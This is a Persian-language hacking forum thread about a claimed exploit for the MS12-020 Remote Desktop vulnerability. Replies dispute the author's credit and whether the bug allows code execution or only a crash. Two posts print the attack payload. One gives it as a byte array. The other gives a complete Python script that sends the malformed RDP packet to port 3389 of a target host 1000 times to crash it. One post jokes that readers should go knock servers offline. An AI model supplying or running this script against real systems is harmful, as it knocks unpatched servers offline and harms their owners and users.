اطلاعیه

Collapse
No announcement yet.

اکسپلویت Remote Desktop نوشته شده توسط سامان فتاح پور برای آسیب پذیری ms12-020

Collapse
This topic is closed.
X
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • اکسپلویت Remote Desktop نوشته شده توسط سامان فتاح پور برای آسیب پذیری ms12-020

    به دليل شعور نداشته يه عده از بازديد كننده ها پاك شد, بعد ميگن ما تمدن داريم, فرهنگ داريم!!
    از مدير انجمن درخواست ميشه اين پست رو كاملا" حذف كنن
    Last edited by samandj15; 01-03-2013, 11:59 AM.
    I D!dn't D!3
    samandj15

  • #2
    x

    کسی هست این یوزر تک پستی رو تایید کنه ؟ h4sh3m تو که تنک زدی میشناسیش ?
    حالا واسه ویندوز مینوشته اشکالش چی بود ؟اصلا مغزم هنگ کرد :دی، گوشی ؟ فوق العاده عجیب
    والا ! مثلا برنامه شوما سالم باشه، ما بخواهیم ناشناس حمله کنیم، ، باید چه کنیم؟ اونم تو گوشی :دی
    Last edited by sissec; 12-31-2012, 09:51 PM.
    وقتی معلم انشاء گفت علم یا ثروت بهش بگو هیچکدوم فقط نباشه "منت"

    Comment


    • #3
      سورسش رو دیدم، امنه، چیز خاصی نداره کلا

      میاد این بایت ها رو می فرسته به سرور:

      3, 0, 0, 19, 14, -32, 0, 0, 0, 0,
      0, 1, 0, 8, 0, 0, 0, 0, 0, 3,
      0, 1, -42, 2, -16, -128, 127, 101, -126, 1,
      -108, 4, 1, 1, 4, 1, 1, 1, 1, -1,
      48, 25, 2, 4, 0, 0, 0, 0, 2, 4,
      0, 0, 0, 2, 2, 4, 0, 0, 0, 0,
      2, 4, 0, 0, 0, 1, 2, 4, 0, 0,
      0, 0, 2, 4, 0, 0, 0, 1, 2, 2,
      -1, -1, 2, 4, 0, 0, 0, 2, 48, 25,
      2, 4, 0, 0, 0, 1, 2, 4, 0, 0,
      0, 1, 2, 4, 0, 0, 0, 1, 2, 4,
      0, 0, 0, 1, 2, 4, 0, 0, 0, 0,
      2, 4, 0, 0, 0, 1, 2, 2, 4, 32,
      2, 4, 0, 0, 0, 2, 48, 28, 2, 2,
      -1, -1, 2, 2, -4, 23, 2, 2, -1, -1,
      2, 4, 0, 0, 0, 1, 2, 4, 0, 0,
      0, 0, 2, 4, 0, 0, 0, 1, 2, 2,
      -1, -1, 2, 4, 0, 0, 0, 2, 4, -126,
      1, 51, 0, 5, 0, 20, 124, 0, 1, -127,
      42, 0, 8, 0, 16, 0, 1, -64, 0, 68,
      117, 99, 97, -127, 28, 1, -64, -40, 0, 4,
      0, 8, 0, -128, 2, -32, 1, 1, -54, 3,
      -86, 9, 4, 0, 0, -50, 14, 0, 0, 72,
      0, 79, 0, 83, 0, 84, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 4, 0, 0, 0, 0, 0, 0, 0, 12,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 1, -54, 1,
      0, 0, 0, 0, 0, 16, 0, 7, 0, 1,
      0, 48, 0, 48, 0, 48, 0, 48, 0, 48,
      0, 45, 0, 48, 0, 48, 0, 48, 0, 45,
      0, 48, 0, 48, 0, 48, 0, 48, 0, 48,
      0, 48, 0, 48, 0, 45, 0, 48, 0, 48,
      0, 48, 0, 48, 0, 48, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0, 4, -64, 12, 0, 13, 0, 0, 0, 0,
      0, 0, 0, 2, -64, 12, 0, 27, 0, 0,
      0, 0, 0, 0, 0, 3, -64, 44, 0, 3,
      0, 0, 0, 114, 100, 112, 100, 114, 0, 0,
      0, 0, 0, -128, -128, 99, 108, 105, 112, 114,
      100, 114, 0, 0, 0, -96, -64, 114, 100, 112,
      115, 110, 100, 0, 0, 0, 0, 0, -64, 3,
      0, 0, 12, 2, -16, -128, 4, 1, 0, 1,
      0, 3, 0, 0, 8, 2, -16, -128, 40, 3,
      0, 0, 12, 2, -16, -128, 56, 0, 6, 3,
      -17, 3, 0, 0, 12, 2, -16, -128, 56, 0,
      6, 3, -21, 3, 0, 0, 12, 2, -16, -128,
      56, 0, 6, 3, -20, 3, 0, 0, 12, 2,
      -16, -128, 56, 0, 6, 3, -19, 3, 0, 0,
      12, 2, -16, -128, 56, 0, 6, 3, -18
      بقیش هم کلا gui اه و چند تا کامند برای ارسال این بایت ها و برقراری کانکشن به سرور
      I'm Not Related To Anonymous Group
      بنده ارتباطی به گروه Anonymous ندارم

      Comment


      • #4
        " تعداد سرور هایی که در حال حاضر دارای این آسیب پذیری rdp هستن خیلی زیاد هست پس فرصت رو از دست ندید"
        این تیکش خیلی خوبه:D
        دوستان بشتابید سرور بخوابونید:-j

        Comment


        • #5
          تا اون جا که من خاطرمه . این باگ Remote code execution بوده . نه DOS
          http://technet.microsoft.com/en-us/s...letin/ms12-020
          اگه کد هایی که به صورت remote ارسال میشه واقعا باعث کرش میشه . میشه روش کارکرد برای اجرای کدهای بهتر . ولی بعید می دونم که DOS بوده باشه.
          My Crime Is My Advisory

          Hacking Is The Best But Security Is The First

          My Crime Is That Of Curiosity

          هميشه راهي براي نفوذ است و هيچ سيستمي به طور مطلق امن نيست. بلكه بايستي آن راه نفوذ را كشف كرد .هنر هك هم در همين نكته متبلور ميشود

          Best Secure Hosting

          قبل پست دادن اینو بخون

          Comment


          • #6
            نوشته اصلی توسط dangeroushacker نمایش پست ها
            تا اون جا که من خاطرمه . این باگ Remote code execution بوده . نه DOS
            http://technet.microsoft.com/en-us/s...letin/ms12-020
            اگه کد هایی که به صورت remote ارسال میشه واقعا باعث کرش میشه . میشه روش کارکرد برای اجرای کدهای بهتر . ولی بعید می دونم که DOS بوده باشه.
            بله, اين آسيب پذيري RCE هست اما هنوز نسخه RCE نوشته نشده چون كنترل اشاره گر esi و crash شدن هسته پيش از اجراي شل كد پيچيده هست, مايكروسافت هم گفته بود كه انتظار نداريم حالا حالا ها نسخه RCE اين آسيب پذيري رو ببينيم, رقابت واسه نوشتن اولين RCE باعث شد كه تعداد زيادي از سايت هاي امنيتي جايزه واسه اولين RCE نوشته شده بذارن.در حال حاضر فقط ميشه گفت اين آسيب پذيري DOS هست در حالي كه ميتونه تبديل به RCE شه
            I D!dn't D!3
            samandj15

            Comment


            • #7
              سورس به زبان پايتون
              http://pastebin.com/jzQxvnpj

              Comment


              • #8
                اینم نسخه andriod
                فایل های پیوست شده

                Comment


                • #9
                  نوشته اصلی توسط crazyfull نمایش پست ها
                  سورس به زبان پايتون
                  http://pastebin.com/jzQxvnpj
                  مشکل داره Syntax Error میده !

                  کد:
                  [LEFT]
                  import socket
                  import sys
                   
                   
                  buf=""
                  buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19
                  buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224
                  buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470
                  buf+="\x02\xf0\x80" # ITU-T Rec X.224
                  buf+="\x7f\x65\x82\x01\x94\x04" #MULTIPOINT-COMMUNICATION-SERVICE T.125
                   
                  buf+="\x01\x01\x04\x01\x01\x01\x01\xff" # "**** you Chelios" packet
                  buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
                  buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
                  buf+="\x00\x00\x00\x00\x02\x04\x00\x00"
                  buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
                  buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
                  buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
                  buf+="\x30\x19\x02\x04\x00\x00\x00\x01"
                  buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
                  buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
                  buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
                  buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
                  buf+="\x04\x20\x02\x04\x00\x00\x00\x02"
                  buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
                  buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
                  buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
                  buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
                  buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
                  buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
                  buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"
                  buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
                  buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
                  buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
                  buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
                  buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"
                  buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
                  buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
                  buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
                  buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
                  buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
                  buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
                  buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
                  buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
                  buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
                  buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
                  buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"
                  buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
                  buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
                  buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
                  buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
                  buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
                  buf+="\xc0"
                   
                  buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
                  buf+="\x02\xf0\x80"  # ITU-T Rec X.224
                  buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125
                  buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8
                  buf+="\x02\xf0\x80" # ITU-T Rec X.224
                  buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125
                  buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
                  buf+="\x02\xf0\x80" # ITU-T Rec X.224
                  buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125
                  buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
                  buf+="\x02\xf0\x80" #ITU-T Rec X.224
                  buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125
                  buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
                  buf+="\x02\xf0\x80" #ITU-T Rec X.224
                  buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125
                  buf+="\x03\x00\x00\x0c"  # TPKT, Version 3, Lenght 12
                  buf+="\x02\xf0\x80" #ITU-T Rec X.224
                  buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125
                  buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
                  buf+="\x02\xf0\x80" #ITU-T Rec X.224
                  buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125
                  buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12
                  buf+="\x06\xd0\x00\x00\x12\x34\x00"  #ITU-T Rec X.224
                   
                  HOST = sys.argv[1]
                  PORT = 3389
                  for i in range(1000):
                          s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                          s.connect((HOST,PORT))
                          print "sending: %d bytes" % len(buf)
                          s.send(buf)
                          rec = s.recv(100)
                          print "received: %d bytes" % len(rec)
                          s.close()[/LEFT]
                  !!! It is a Fake Account

                  Comment


                  • #10
                    کی یاد میگیریم دست از این لمر بازی ها برداریم؟
                    اکسپلویت RDP نوشته شذه توسط سامان فاتح پور . پس اون یارو چینیه انه؟
                    برای یه کد perl یا هر گه دیگه ساده اینترفیس نوشتی ؟
                    این چی این انه؟
                    http://www.f-secure.com/weblog/archives/00002338.html

                    بس کن بابا اینقدر سواری نگیرید از ....

                    در ضمن هر کد آشغالی هم دستتون رسید اجرا نکنید اینم دلیل که به اسم RCE این اکسپلویت چند نفر به فنا رفتن:
                    http://www.insinuator.net/2012/04/un...professionals/
                    ...

                    Comment


                    • #11
                      خخخخخخخخخخخ

                      داداش سامان ضایهههه شدددد
                      ...

                      Comment

                      Working...
                      X